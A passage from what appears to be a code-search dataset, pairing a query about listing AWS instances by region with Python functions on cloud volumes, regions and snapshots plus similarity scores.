float(dicom_info.SliceThickness))\n print(\" Pixel spacing: {}\".format(pixel_spacing))\n # create 3D array for pet image\n pet_image = np.zeros(pixel_shape, dtype=dicom_info.pixel_array.dtype)\n for i, dicom_img in enumerate(dicom_images):\n ds = dicom.read_file(dicom_img)\n pet_image[:, :, i] = ds.pixel_array\n # create contours structure\n mtv_variables = []\n for struct_folder in struct_folders:\n # extract contours labels and index from lvol.txt\n lvoltxt_file = struct_folder + \"/lvol.txt\"\n with open(lvoltxt_file) as f:\n lines = f.readlines()\n for i, line in enumerate(lines):\n if (\"mtv\" in line.lower() and (\"cervix\" in line.lower() or \"tumor\" in line.lower()) and\n \"nodal\" not in line.lower() and \"nodes\" not in line.lower() and\n \"ring\" not in line.lower() and \"opt\" not in line.lower()):\n struct = line.strip().split(\"|\")\n mtv_variables.append((int(struct[0]), struct[-1], struct_folder))\n # return nothing if no mtv contours were found\n if len(mtv_variables) == 0:\n return [], volumes, []\n # add contours to original image and plot it\n prev_folder = None\n patient_volumes = [pet_image]\n print(\" Possible MTV contours:\")\n for mtv_idx, mtv_label, mtv_folder in mtv_variables:\n # read and transform data from nii file\n if prev_folder != mtv_folder:\n # only read mtv_folder if it has changed\n nii_obj = nib.load(mtv_folder + \"/lvol.nii\")\n nii_data = nii_obj.get_data()\n volume = np.zeros(nii_data.shape[:3], dtype=int)\n for i in range(nii_data.shape[-1]):\n volume += nii_data[:, :, :, 0, i] << (8 * i)\n volume = np.swapaxes(volume, 0, 1)\n volume = np.flip(volume, 2)\n print(\" * Structures folder: {}\".format(mtv_folder.split(\"/\")[-1]))\n print(\" MTV_index:\", mtv_idx)\n print(\" MTV_label:\", mtv_label.split(\"/\")[-1])\n prev_folder = mtv_folder\n # create 3D matrix with 1s where ROI is and 0s everwhere else\n try:\n tumor_volume = (np.bitwise_and(volume, 2 ** mtv_idx) > 0) * 1\n except TypeError:\n print(\"Error while reading volume for index: {}, label: {}!\".format(mtv_idx,\n mtv_label))\n patient_volumes.append(())\n continue\n # find bounding box for volume\n mask_range = [[pixel_shape[0], pixel_shape[1], pixel_shape[2]], [-1, -1, -1]]\n tumor_exists = False\n for xx in range(pixel_shape[0]):\n for yy in range(pixel_shape[1]):\n for zz in range(pixel_shape[2]):\n if tumor_volume[xx, yy, zz]:\n tumor_exists = True\n mask_range[0][0] = min(mask_range[0][0], xx)\n mask_range[0][1] = min(mask_range[0][1], yy)\n mask_range[0][2] = min(mask_range[0][2], zz)\n mask_range[1][0] = max(mask_range[1][0], xx)\n mask_range[1][1] = max(mask_range[1][1], yy)\n mask_range[1][2] = max(mask_range[1][2], zz)\n # continue if the mask is all 0s\n if not tumor_exists:\n print(\"Volume not found for index: {}, label: {}!\".format(mtv_idx, mtv_label))\n patient_volumes.append(())\n continue\n # Get ROI\n current_volume = pet_image[mask_range[0][0]:mask_range[1][0]+1,\n mask_range[0][1]:mask_range[1][1]+1,\n mask_range[0][2]:mask_range[1][2]+1]\n current_mask = tumor_volume[mask_range[0][0]:mask_range[1][0]+1,\n mask_range[0][1]:mask_range[1][1]+1,\n mask_range[0][2]:mask_range[1][2]+1]\n # Add volumes to patient_volumes\n patient_volumes.append((current_mask, mtv_label, mask_range, mtv_folder))\n # Plot volumes\n if plot_data:\n plot_pet_medians(pet_image, pixel_spacing, mask=tumor_volume, median=0, fig_num=0,\n patient=patient, mask_name=mtv_label.split(\"/\")[-1])\n plot_pet_medians(pet_image, pixel_spacing, mask=tumor_volume, median=1, fig_num=1,\n patient=patient, mask_name=mtv_label.split(\"/\")[-1])\n plot_pet_medians(pet_image, pixel_spacing, mask=tumor_volume, median=2, fig_num=2,\n patient=patient, mask_name=mtv_label.split(\"/\")[-1])\n input(\"press ENTER to continue... \")\n plot_pet_volume(current_volume, pixel_shape, pixel_spacing, mask=current_mask,\n patient=patient, mask_name=mtv_label.split(\"/\")[-1])\n volumes[patient] = patient_volumes\n return mtv_variables, volumes, pixel_spacing", "def test_aws_service_api_volume_get(self):\n pass", "def get_basic_volume_info_all():\n vl = None\n try:\n d, err = xml_parse.run_gluster_command(\n '/usr/sbin/gluster volume info all --xml')\n if err:\n raise Exception(err)\n\n root = d[\"root\"]\n\n # Get the admin vol name so it can be excluded from the list\n admin_vol_name, err = config.get_admin_vol_name()\n if err:\n raise Exception(err)\n\n # Now get the all the volume info for user created volumes\n vl, err = xml_parse.get_volume_info(root, admin_vol_name)\n if err:\n raise Exception(err)\n except Exception, e:\n return None, 'Error getting basic volume information for all volumes : %s' % str(e)\n else:\n return vl, None", "def volumes(self) -> Iterable[dto.Volume]:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def _get_available_regions():\n session = boto3.session.Session()\n\n return session.get_available_regions(service_name='s3')", "def get_all_variants():\n # reads the session\n session = request.args.get('session', type=str)\n # reads the requested process name\n process = request.args.get('process', default='receipt', type=str)\n\n dictio = {}\n\n if check_session_validity(session):\n user = get_user_from_session(session)\n if lh.check_user_log_visibility(user, process):\n variants = lh.get_handler_for_process_and_session(process, session).get_variant_statistics()\n dictio = {\"variants\": variants}\n\n ret = jsonify(dictio)\n\n return ret", "def getVolumes(self, df: str = None, ts: str = None, cursor: str = None, pageSize: int = None):\n params = {\n 'df': df,\n 'ts': ts,\n 'cursor': cursor,\n 'pageSize': pageSize\n }\n return self.api_get_request(f'{self.NINJA_API_QUERIES_VOLUMES}', params=params)", "def regions_json(self, filename):\n with open(filename) as f:\n return json.load(f)", "def get_volume_list(self, name_or_ip=\"\" , part=\"\", noresolve=False, _cfg=None) :\n command_list = [_cfg.binaries[\"vos\"],\"listvldb\", \"-cell\",\"%s\" % _cfg.cell ]\n if name_or_ip != \"\" :\n command_list += [ \"-server\", \"%s\" % name_or_ip ] \n if part != \"\" :\n command_list += [\"-part\", \"%s\" % part]\n if noresolve :\n command_list.append(\"-noresolve\")\n return command_list, PM.get_volume_list", "def snapshots(self, owner=None, restorable_by=None):\r\n rs = self.connection.get_all_snapshots(owner=owner,\r\n restorable_by=restorable_by)\r\n mine = []\r\n for snap in rs:\r\n if snap.volume_id == self.id:\r\n mine.append(snap)\r\n return mine", "def fusion_api_get_storage_volumes_template(self, uri=None, param='', api=None, headers=None):\n return self.template.get(uri=uri, api=api, headers=headers, param=param)", "def getRegions(self, polygon: Polygon, epsg: int) -> list:\n self.output_epsg = epsg\n polygon_df = gpd.GeoDataFrame([polygon], columns=['geometry'])\n\n polygon_df.set_crs(epsg=self.output_epsg, inplace=True)\n polygon_df['geometry'] = polygon_df['geometry'].to_crs(epsg=self.input_epsg)\n minx, miny, maxx, maxy = polygon_df['geometry'][0].bounds\n\n cond_xmin = self.metadata.xmin <= minx\n cond_xmax = self.metadata.xmax >= maxx\n cond_ymin = self.metadata.ymin <= miny\n cond_ymax = self.metadata.ymax >= maxy\n\n df = self.metadata[cond_xmin & cond_xmax & cond_ymin & cond_ymax]\n sort_df = df.sort_values(by=['year'])\n regions = sort_df['filename'].to_list()\n return regions", "def get_region_data(region):\n cursor = reg_data_coll.find({REGION_KEY: region})\n df = pd.DataFrame(list(cursor))\n if df.empty:\n app.logger.error(f\"While getting {region} data: no data\")\n return df", "def read_regions(namefile):\n db = shelve.open(namefile)\n key_firms = db['nif']\n regions = db['regions']\n methodvalues = db['methodvalues']\n db.close()\n return key_firms, regions, methodvalues", "def load_snapshot(base_path, snap_num, subvolumes, group, fields, matches):\n n_init = []\n\n snap_key = 'N{}_ThisFile_Redshift'.format('groups' if group == 'Haloprop' else 'subgroups')\n for subvolume in subvolumes: \n n_init.append(load_header(base_path, subvolume)[snap_key][snap_num])\n \n # initialize objects structure\n result = {}\n \n with h5py.File(file_path(base_path, subvolumes[0], 'subvolume'), 'r') as f:\n # galprop and haloprop both have a redshift quantity so we can use that to query for the snapshot we want\n filter_field = '{}Redshift'.format(group)\n \n if not fields:\n fields = list(f[group].keys())\n\n # make sure the redshift field is included in fields\n if filter_field not in fields:\n fields.append(filter_field) \n \n for field in fields:\n if field not in f[group].keys():\n raise Exception(\"Catalog does not have requested field [{}]!\".format(field))\n\n shape = list(f[group][field].shape)\n shape[0] = np.sum(n_init)\n\n # allocate within return dict\n result[field] = np.zeros(shape, dtype=f[group][field].dtype)\n\n if matches:\n with h5py.File(file_path(base_path, subvolumes[0], 'matches'), 'r') as f:\n for field in f[group].keys():\n result[field] = np.zeros(shape, dtype=f[group][field].dtype)\n\n header = load_header(base_path, subvolumes[0])\n filter_condition = header['Redshifts'][snap_num]\n\n offset = 0\n\n for subvolume in subvolumes:\n subvol_result = load_subvolume(base_path, subvolume, group, fields, matches, False)\n\n idx = subvol_result[filter_field][:] == filter_condition\n\n for field in subvol_result.keys():\n if len(subvol_result[field].shape) != 1:\n result[field][offset:offset+n_init[0], :] = subvol_result[field][idx]\n else:\n result[field][offset:offset+n_init[0]] = subvol_result[field][idx]\n\n offset += n_init[0]\n del n_init[0]\n \n return result", "def get_vgs() -> List[str]:\n p = subprocess.run(\n [\"vgs\", \"--reportformat\", \"json\"], check=True, capture_output=True\n )\n output = json.loads(p.stdout)\n return [vg[\"vg_name\"] for vg in output[\"report\"][0][\"vg\"]]", "def derived_snapshots(self):\n start_time = time.time()\n log.debug(\"Getting snaps derived from volume {0}.\".format(self.volume_id))\n derived_snapshots = []\n for snap in self.app.cloud_interface.get_all_snapshots():\n try:\n if snap.volume_id == self.volume_id:\n derived_snapshots.append(snap)\n except EC2ResponseError, e:\n log.warning(\"EC2ResponseError getting snapshot status: {0} \"\n \"(code {1}; status {2})\"\n .format(e.message, e.error_code, e.status))\n log.debug(\"Got snaps derived from volume {0} in {1} seconds: {2}\"\n .format(self.volume_id, time.time() - start_time, derived_snapshots))\n return derived_snapshots", "def getStorageVolumeData(self,node,storage,volume):\n data = self.connect('get','nodes/%s/storage/%s/content/%s' % (node,storage,volume),None)\n return data", "def get_regions_in_partition(self, prefix=None, delimiter='/'):\n if prefix is None:\n prefix = self.s3_path\n else:\n prefix = self._strip_slashes(prefix)\n\n query_params = {\n 'Bucket': self.s3_bucket,\n 'Prefix': prefix + '/',\n 'Delimiter': delimiter\n }\n\n # We currently should be able to get all regions in a single request\n # TODO: Fail if we get a next token - there's more to this prefix than meets the eye\n region_list = []\n response = self.s3_client.list_objects_v2(**query_params)\n for c_prefix in response.get('CommonPrefixes', []):\n region = self._extract_region_from_prefix(c_prefix)\n if region:\n region_list.append(region)\n\n return region_list", "def split_copies(region, vl):\n # Sniff out the ploidy\n if len(vl) == 0:\n logger.warning('Empty region ({}), assuming diploid'.format(region))\n ploidy = 2\n else:\n ploidy = len(vl[0].samples[0]['GT'])\n logger.debug('Region: {}, ploidy: {}'.format(region, ploidy))\n\n # cpy_l = [\n # (cpy, '|'.join(['0'] * cpy + ['1'] + ['0'] * (ploidy - 1 - cpy)))\n # for cpy in range(ploidy)\n # ]\n #\n # return {\n # 'region': region,\n # 'v': dict(\n # [\n # (gt, list(filter(None, (parse(v, cpy=cpy) for v in vl))))\n # for cpy, gt in cpy_l\n # ]\n # )\n # }\n\n return {\n 'region': region,\n 'v': [\n list(filter(None, (parse(v, cpy=cpy) for v in vl)))\n for cpy in range(ploidy)\n ]\n }", "def generate_volume_info(self, NAME, path):\n info = {'tags': [], 'name': NAME, 'path': path, 'AttachedToVm': [],\n 'State': 'available', 'machine_path': None,\n 'time': datetime.datetime.now()}\n return info", "async def paginated_list(\n cls,\n status: str = 'ALIVE',\n *,\n fields: Sequence[FieldSpec] = _default_list_fields,\n page_offset: int = 0,\n page_size: int = 20,\n filter: str = None,\n order: str = None,\n ) -> PaginatedResult[dict]:\n return await generate_paginated_results(\n 'storage_volume_list',\n {\n 'filter': (filter, 'String'),\n 'order': (order, 'String'),\n },\n fields,\n page_offset=page_offset,\n page_size=page_size,\n )", "def vm_diskfilter(self):\r\n vm_diskfilter = []\r\n if self._vmDiskFilter is not None:\r\n subclient_diskfilter = self._vmDiskFilter\r\n\r\n if 'filters' in subclient_diskfilter:\r\n filters = subclient_diskfilter['filters']\r\n\r\n for child in filters:\r\n filter_type_id = str(child['filterType'])\r\n filter_type = self.filter_types[str(child['filterType'])]\r\n vm_id = child['vmGuid'] if 'vmGuid' in child else None\r\n filter_name = child['filter']\r\n\r\n temp_dict = {\r\n 'filter': filter_name,\r\n 'filterType': filter_type,\r\n 'vmGuid': vm_id,\r\n 'filterTypeId': filter_type_id\r\n }\r\n\r\n vm_diskfilter.append(temp_dict)\r\n else:\r\n vm_diskfilter = self._vmDiskFilter\r\n\r\n if len(vm_diskfilter) == 0:\r\n vm_diskfilter = None\r\n return vm_diskfilter", "def get_subvols(self, refresh=False):\n if not refresh and hasattr(self, \"subvols\"):\n return\n self.subvols = {}\n cmd = ['btrfs', 'subvol', 'list', '-p', self.path]\n out, err, ret = self.justcall(cmd)\n if ret != 0:\n raise InitError(\"error running btrfs subvol list %s:\\n\"%self.path+err)\n\n for line in out.split(\"\\n\"):\n if len(line) == 0:\n continue\n l = line.split()\n subvol = {}\n subvol['id'] = l[1]\n subvol['parent_id'] = l[3]\n subvol['top'] = l[6]\n subvol['path'] = line[line.index(\" path \")+6:]\n self.subvols[subvol['id']] = subvol", "def get_content(self):\r\n content = []\r\n for regiongroup in self.region_groups:\r\n for region in regiongroup.get_content():\r\n # Add date, unique_name and project to the metadata\r\n region[0]['date'] = self.extracted_date\r\n region[0]['unique_name'] = self.unique_name\r\n try:\r\n project = os.path.split(\r\n os.path.split(self.unique_name)[0]\r\n )[1]\r\n except IndexError:\r\n project = ''\r\n region[0]['project'] = project\r\n content.append(region)\r\n return content", "def ls(region_name=DEFAULT_REGION):\n s3conn = s3.connect_to_region(region_name)\n buckets = s3conn.get_all_buckets()\n for bucket in buckets:\n print(bucket.name)", "def get_variants_in_intervalset(db, intervalset):\n for mongo_match_region in intervalset.to_list_of_mongos():\n for variant in db.variants.find(mongo_match_region, projection={'_id': False}):\n yield variant", "def get_shells(velocity_file='../shell_candidates/AllShells_vrange_NtoS.txt',\n region_file='../shell_candidates/AllShells_NtoS.reg',\n ra_col=\"ra\", dec_col=\"dec\", radius_col=\"radius\", vmin_col='vmin', vmax_col='vmax',\n ra_unit='deg', dec_unit='deg', radius_unit='deg', v_unit='km/s'):\n shell_list = []\n try:\n region_list = pyregion.open(region_file)\n vel_table = ascii.read(velocity_file)\n vmin_list, vmax_list = vel_table[vmin_col], vel_table[vmax_col]\n except ValueError:\n raise\n\n for i, region in enumerate(region_list):\n ra, dec, radius = region.coord_list[0], region.coord_list[1], region.coord_list[2]\n shell_list += [Shell(ra, dec, radius, vmin_list[i], vmax_list[i])]\n\n\n return shell_list", "def RegionList(self):\n command = \"\"\"\n IPython.notebook.kernel.execute(\"RegionList=\" + JSON.stringify(JS9.GetShapes(\"regions\", {{display: '{wid}JS9'}})));\n \"\"\".format(wid=self.wid)\n get_ipython().run_cell_magic('javascript', '', command)", "def get_regionlist(chosenmodel):\n regionlist = list(chosenmodel.regions.keys())\n [ regionlist.remove(key) for key in regionlist\n if type(chosenmodel.regions[key]) is dict ]\n return regionlist" ]
[ "0.70386356", "0.68808", "0.6829185", "0.68042403", "0.6804185", "0.66357", "0.65796185", "0.6541075", "0.64998627", "0.6476049", "0.6467089", "0.6443325", "0.641429", "0.64000684", "0.62908834", "0.62458056", "0.61916316", "0.6191406", "0.611974", "0.6119484", "0.61047727", "0.6095844", "0.6070277", "0.60485876", "0.60419893", "0.6039224", "0.6025237", "0.59674895", "0.59635985", "0.5837586", "0.5828543", "0.5778964", "0.5778964", "0.5778964", "0.57782954", "0.5764721", "0.5711723", "0.5705303", "0.5687343", "0.56708914", "0.56621957", "0.5638317", "0.5635446", "0.5606726", "0.5565686", "0.555421", "0.5549527", "0.5541851", "0.5530126", "0.5503141", "0.5502502", "0.5493635", "0.54812187", "0.54779744", "0.5475513", "0.5470473", "0.54672587", "0.54560816", "0.54373354", "0.5425991", "0.542375", "0.5410085", "0.5406218", "0.5396337", "0.5392887", "0.53886634", "0.5385871", "0.5373164", "0.5373164", "0.5372205", "0.5370696", "0.53689784", "0.53604686", "0.5359323", "0.5349511", "0.533205", "0.5317229", "0.5316851", "0.53161603", "0.52946466", "0.5286341", "0.52836925", "0.5283136", "0.5274903", "0.5272932", "0.5269834", "0.52697915", "0.5267142", "0.52603227", "0.52579004", "0.525612", "0.5252837", "0.52517414", "0.5249301", "0.52175134", "0.5214611", "0.52061194", "0.520546", "0.5190724", "0.51883817" ]
0.77420294
0
return a list of dictionaries representing instances for one region, will help with volumeinstanceKEEPtag lookup. Maybe.
def getInstancesD(region): instances = getInstances(region) instancesDicts = {"id": i.id, "KEEP-tag": getKeepTag(i), "instance_type": i.instance_type, "state": i.state, "launch_time": i.launch_time, "security_groups": getGroups(i), "region": i.region.name, "PROD": isProduction(i) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_instances(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_instances = []\n reservations = conn.get_all_reservations()\n for reservation in reservations:\n for instance in reservation.instances:\n region_instances.append(instance)\n except boto.exception.EC2ResponseError:\n return []\n return region_instances", "def _instancelist(self):\n\n rv = []\n self.iname = {}\n for resv in self.conn.get_all_reservations():\n for inst in resv.instances:\n if inst.state != 'terminated':\n name = inst.tags.get('Name',None)\n rv.append([inst.id,inst.state])\n if name is not None:\n rv.append([name,inst.state])\n else:\n rv.append([inst.id+'-needsName',inst.state])\n self.iname[name] = inst.id\n self.iname[inst.id] = inst.id\n return rv", "def listInstancesRegionZone(region,zone):\n\tprint \"-\"*80\n\tprint \"# Region :\",region,\" Zone\", zone\t\n\tprint \"-\"*80\n\tinstances = getInstancesRegionZone(region,zone)\n\tif instances:\n\t\tfor instance in instances:\n\t\t\tprint \"[\",instance.ami_launch_index,\"]\",instance.ip_address,\" (\",instance.private_ip_address,\") \",instance.instance_type,\" key=\",instance.key_name", "def getVolumesD(region):\n volumes = getVolumes(region)\n instances = getInstancesD(region)\n\n volumesDicts = []\n for v in volumesDicts:\n volumesDict = {\"id\": v.id,\n \"KEEP-tag\": getKeepTag(v),\n \"instance_KEEP-tag\": getKeepTag(getInstanceOf(v)),\n \"instance\": v.attach_data.instance_id,\n \"status\": v.status,\n \"size\": v.size,\n \"create-time\": v.create_time,\n \"region\": v.region.name,\n \"zone\": v.zone,\n \"snapshot_id\": v.snapshot_id,\n \"PROD\": isProduction(v)\n }", "def _get_instances(instance_tags, region):\n return ec2_conn[region].get_all_instances(filters={\"tag:Name\": instance_tags})", "def tags(self) -> Dict:\n return dict(self.client.get_instances_id_tags(self.id_))", "def get_instances(self):\n connection = self.connection\n\n instances = []\n\n connection.row_factory = sqlite3.Row\n cur = connection.cursor()\n cur.execute(\"SELECT * FROM INSTANCES\")\n rows = cur.fetchall()\n columns = [str(i[0]).lower() for i in cur.description]\n for row in rows:\n object = dict(zip(columns, row))\n instances.append(object)\n\n instancesNoneDict = {}\n\n for instance in instances:\n if instance['harvesterid'] not in instancesNoneDict:\n instancesNoneDict[instance['harvesterid']] = {}\n if instance['harvesterhost'] not in instancesNoneDict[instance['harvesterid']]:\n instancesNoneDict[instance['harvesterid']][instance['harvesterhost']] = {\n 'availability': instance['availability'], 'errorsdesc': instance['errorsdesc'],\n 'contacts': instance['contacts'].split(','),\n 'active': instance['active'], 'notificated': instance['notificated']}\n elif instance['harvesterid'] in instancesNoneDict:\n if instance['harvesterhost'] not in instancesNoneDict[instance['harvesterid']]:\n instancesNoneDict[instance['harvesterid']][instance['harvesterhost']] = {\n 'availability': instance['availability'], 'errorsdesc': instance['errorsdesc'],\n 'contacts': instance['contacts'].split(','),\n 'active': instance['active'], 'notificated': instance['notificated']}\n if 'none' in instancesNoneDict[instance['harvesterid']]:\n del instancesNoneDict[instance['harvesterid']]['none']\n return instancesNoneDict", "def getImagesD(region):\n images = getImages(region)\n imageDicts = []\n for im in images:\n imageDict = {\"name\": im.name,\n \"id\": im.id,\n \"region\": im.region.name,\n \"state\": im.state,\n \"created\": im.creationDate,\n \"type\": im.type,\n \"KEEP\": getKeepTag(im),\n \"name_tag\": get_name_tag(im),\n \"snapshots\": getSnapshotsOf(im),\n \"description\": im.description,\n \"PROD\": isProduction(im)\n }\n imageDicts.append(imageDict)\n return imageDicts", "def get_instances() -> dict:\n url = f\"{app.config['COMPUTE_SERVERS_REF']}/detail\"\n instances_rq = request(\n method=\"GET\", url=url, headers=build_header(), params={\"vm_state\": \"active\"},\n )\n\n if not instances_rq.ok:\n HTTPError(instances_rq.status_code)\n\n answer = {\"servers\": list()}\n for instance in instances_rq.json()[\"servers\"]:\n instance_info = dict(name=instance[\"name\"])\n instance_info[\"ip_addresses\"] = list()\n for network, info in instance[\"addresses\"].items():\n instance_info[\"ip_addresses\"].extend(entry[\"addr\"] for entry in info)\n answer[\"servers\"].append(instance_info)\n\n return answer", "def _aws_get_instance_by_tag(region, name, tag, raw):\n client = boto3.session.Session().client('ec2', region)\n matching_reservations = client.describe_instances(Filters=[{'Name': tag, 'Values': [name]}]).get('Reservations', [])\n instances = []\n [[instances.append(_aws_instance_from_dict(region, instance, raw)) # pylint: disable=expression-not-assigned\n for instance in reservation.get('Instances')] for reservation in matching_reservations if reservation]\n return instances", "def instances(self):\r\n # It would be more efficient to do this with filters now\r\n # but not all services that implement EC2 API support filters.\r\n instances = []\r\n rs = self.connection.get_all_instances()\r\n for reservation in rs:\r\n uses_group = [g.name for g in reservation.groups if g.name == self.name]\r\n if uses_group:\r\n instances.extend(reservation.instances)\r\n return instances", "def get_ec2_instances(client):\n reservations = client.describe_instances().get(\"Reservations\")\n instances = list(map(lambda x: x.get(\"Instances\"), reservations))\n instances = list(itertools.chain.from_iterable(instances))\n return list(map(lambda x: {\n 'name': next((t['Value'] for t in x.get('Tags', []) if t.get('Key') == 'Name'), 'Unknown'),\n 'id': x.get('InstanceId'),\n 'state': x.get('State'),\n }, instances))", "def getSnapshotsD(region):\n # Can a snapshot belong to more than one AMI? Dunno, keep list just in case (so it never breaks due to it)\n snapshots = getSnapshots(region)\n snapshotsDicts = []\n ims = getImages(region)\n for s in snapshots:\n amis = getAmisOf(s, ims)\n amiIds = []\n amiKeeps = []\n\n if len(amis) == 1:\n amiIds = amis[0].id.encode()\n amiKeeps = getKeepTag(amis[0])\n\n elif len(amis) == 0:\n amiIds = \"-------no-AMI-found\"\n amiKeeps = \"-------no-AMI-found\"\n else:\n for a in amis:\n amiIds.append(a.id.encode())\n amiKeeps.append(getKeepTag(a))\n\n snapshotsDict = {\"id\": s.id,\n \"status\": s.status,\n \"region\": s.region.name,\n \"progress\": s.progress,\n \"start_time\": s.start_time,\n \"volume_id\": s.volume_id,\n \"volume_size\": s.volume_size,\n \"KEEP-tag\": getKeepTag(s),\n \"Name\": get_name_tag(s),\n \"AMI(s)\": amiIds,\n \"AMI_KEEP-tags\": amiKeeps,\n \"PROD\": isProduction(s),\n \"Description\": s.description\n }\n snapshotsDicts.append(snapshotsDict)\n return snapshotsDicts", "def get_instances(instance_ids):\n\n instances = dict()\n conn = connect_to_region(REGION, aws_access_key_id=KEY_ID, aws_secret_access_key=ACCESS_KEY)\n try:\n reservations = conn.get_all_instances(instance_ids)\n except EC2ResponseError, ex:\n print 'Got exception when calling EC2 for instances (%s): %s' % \\\n (\", \".join(instance_ids), ex.error_message)\n return instances\n\n for r in reservations:\n if len(r.instances) and r.instances[0].id in instance_ids:\n instances[r.instances[0].id] = r.instances[0].tags[\"Name\"]\n\n return instances", "def get_tags(self) -> Dict:\n return self.orthanc.get_instance_tags(self.identifier)", "def populate_instances(self):\n print \"Populating instances info...\"\n instances = self.get_all_instances()\n for i in instances:\n self.spreadsheet[i.id] = dict(Name_tag=self.get_name_tag(i), id=i.id, KEEP_tag=self.get_keep_tag(i),\n PROD_tag=self.is_production(i), instance_type=i.instance_type,\n state=i.state, launched=i.launch_time, region=i.region.name)", "def getXeprInstances():\n apilib = _loadapilib()\n instances = _findInst(apilib)\n return dict([(p, t) for p, t in instances])", "def get_instance_templates(self):\n response = self.call_api('/global/instanceTemplates')\n return {\n template['name']: template for template in response.get('items', [])\n }", "def get_all_reservations(config):\n reservations = []\n region_list = regions(aws_access_key_id=config.keys.api,\n aws_secret_access_key=config.keys.secret)\n for region in region_list:\n _logger.info(\"Searching %s\", region)\n cnx = region.connect(aws_access_key_id=config.keys.api,\n aws_secret_access_key=config.keys.secret)\n for reservation in cnx.get_all_instances():\n _logger.info(\"Found %s %s\", reservation,\n [str(i.id) for i in reservation.instances])\n reservations.append(reservation)\n return reservations", "def aws_get_instances_by_id(region, instance_id, raw=True):\n client = boto3.session.Session().client('ec2', region)\n try:\n matching_reservations = client.describe_instances(InstanceIds=[instance_id]).get('Reservations', [])\n except ClientError as exc:\n if exc.response.get('Error', {}).get('Code') != 'InvalidInstanceID.NotFound':\n raise\n return []\n instances = []\n [[instances.append(_aws_instance_from_dict(region, instance, raw)) # pylint: disable=expression-not-assigned\n for instance in reservation.get('Instances')] for reservation in matching_reservations if reservation]\n return instances", "def ow_instances(ow, ow_stack):\n log.info(\"ow_instances( %s )\", ow_stack)\n try:\n instances = ow.describe_instances(StackId=ow_stack)\n except Exception, e:\n print(e)\n log.info(e)\n sys.exit()\n ow_launch_data = {}\n for instance in instances['Instances']:\n created_at = datetime.datetime.strptime(\n instance['CreatedAt'], '%Y-%m-%dT%H:%M:%S+00:00').strftime('%s')\n ow_launch_data[instance['InstanceId']] = created_at\n log.info(\"instance %s, created %s\", instance, created_at)\n return ow_launch_data", "def find_instances(\n instance_id=None,\n name=None,\n tags=None,\n region=None,\n key=None,\n keyid=None,\n profile=None,\n return_objs=False,\n in_states=None,\n filters=None,\n):\n conn = _get_conn(region=region, key=key, keyid=keyid, profile=profile)\n\n try:\n filter_parameters = {\"filters\": {}}\n\n if instance_id:\n filter_parameters[\"instance_ids\"] = [instance_id]\n\n if name:\n filter_parameters[\"filters\"][\"tag:Name\"] = name\n\n if tags:\n for tag_name, tag_value in tags.items():\n filter_parameters[\"filters\"][\"tag:{}\".format(tag_name)] = tag_value\n\n if filters:\n filter_parameters[\"filters\"].update(filters)\n\n reservations = conn.get_all_reservations(**filter_parameters)\n instances = [i for r in reservations for i in r.instances]\n log.debug(\n \"The filters criteria %s matched the following instances:%s\",\n filter_parameters,\n instances,\n )\n\n if in_states:\n instances = [i for i in instances if i.state in in_states]\n log.debug(\n \"Limiting instance matches to those in the requested states: %s\",\n instances,\n )\n if instances:\n if return_objs:\n return instances\n return [instance.id for instance in instances]\n else:\n return []\n except boto.exception.BotoServerError as exc:\n log.error(exc)\n return []", "def list_instances():\n print(str_sep)\n print(\"Listing EC2 instances from [{}] region.\".format(SESSION.region_name))\n print(\"{:20s}{:15s}{:10s}{}\".format(\"ID\", \"TYPE\", \"STATE\", \"NAME\"))\n print(str_sep)\n\n try:\n for instance in EC2_MANAGER.list_instances():\n # get the instance name in the tags list\n name = next((item for item in instance.tags if item[\"Key\"] == \"Name\"),\n {'Key': 'Name', 'Value': 'None'})\n\n print(\"{:20s}{:15s}{:10s}{}\".format(instance.id,\n instance.instance_type,\n instance.state['Name'],\n name['Value']))\n except ClientError as e:\n ErrManager.err_manager(e)\n\n print(str_sep)", "def simplified_tags(self) -> Dict:\n return dict(self.client.get_instances_id_tags(self.id_, params={'simplify': True}))", "def instances(self):\n return self.get('instances')", "def list_instances(self):\n\n response = self.client.service.instances().aggregatedList(\n project=self.client.project_id).execute()\n\n zones = response.get('items', {})\n instances = []\n for zone in zones.values():\n for instance in zone.get('instances', []):\n instances.append(instance)\n\n return instances", "def list_aws_instances(verbose=False, state='all'):\n conn = get_ec2_connection()\n\n reservations = conn.get_all_reservations()\n instances = []\n for res in reservations:\n for instance in res.instances:\n if state == 'all' or instance.state == state:\n instance = {\n 'id': instance.id,\n 'type': instance.instance_type,\n 'image': instance.image_id,\n 'state': instance.state,\n 'instance': instance,\n }\n instances.append(instance)\n env.instances = instances\n if verbose:\n import pprint\n pprint.pprint(env.instances)", "def ListInstances(self,\n resource_group_name: Optional[str] = None\n ) -> Dict[str, 'AZComputeVirtualMachine']:\n instances = {} # type: Dict[str, AZComputeVirtualMachine]\n az_vm_client = self.compute_client.virtual_machines\n if not resource_group_name:\n responses = common.ExecuteRequest(az_vm_client, 'list_all')\n else:\n responses = common.ExecuteRequest(\n az_vm_client,\n 'list',\n {'resource_group_name': resource_group_name})\n for response in responses:\n for instance in response:\n instances[instance.name] = AZComputeVirtualMachine(\n self.az_account,\n instance.id,\n instance.name,\n instance.location,\n zones=instance.zones)\n return instances", "def aws_get_instances_by_name(region, name, raw=True):\n return _aws_get_instance_by_tag(region, name, 'tag:Name', raw)", "def list_ec2(region, filter_by_kwargs):\n conn = boto.ec2.connect_to_region(region)\n instances = conn.get_only_instances()\n return lookup(instances, filter_by=filter_by_kwargs)", "def ListInstanceTypes(self,\n region: Optional[str] = None) -> List[Dict[str, Any]]:\n if not region:\n region = self.az_account.default_region\n available_vms = self.compute_client.virtual_machine_sizes.list(region)\n vm_sizes = []\n for vm in available_vms:\n vm_sizes.append({\n 'Name': vm.name,\n 'CPU': vm.number_of_cores,\n 'Memory': vm.memory_in_mb\n })\n return vm_sizes", "def getinstancelist():\n dbcursor_dict.execute(dbq.get_all_instance_list, )\n db_instance_list = dbcursor_dict.fetchall()\n return db_instance_list", "def get_instance_list(\n client,\n prefix: str\n):\n l = set()\n page = client.list_objects_v2(\n Bucket=bucket, Prefix=prefix, MaxKeys=page_size\n )\n l |= {r['Key'] for r in page['Contents'] if r['Key'][-4:] == 'json'}\n\n while page['IsTruncated']:\n page = client.list_objects_v2(\n Bucket=bucket,\n Prefix=prefix,\n MaxKeys=page_size,\n 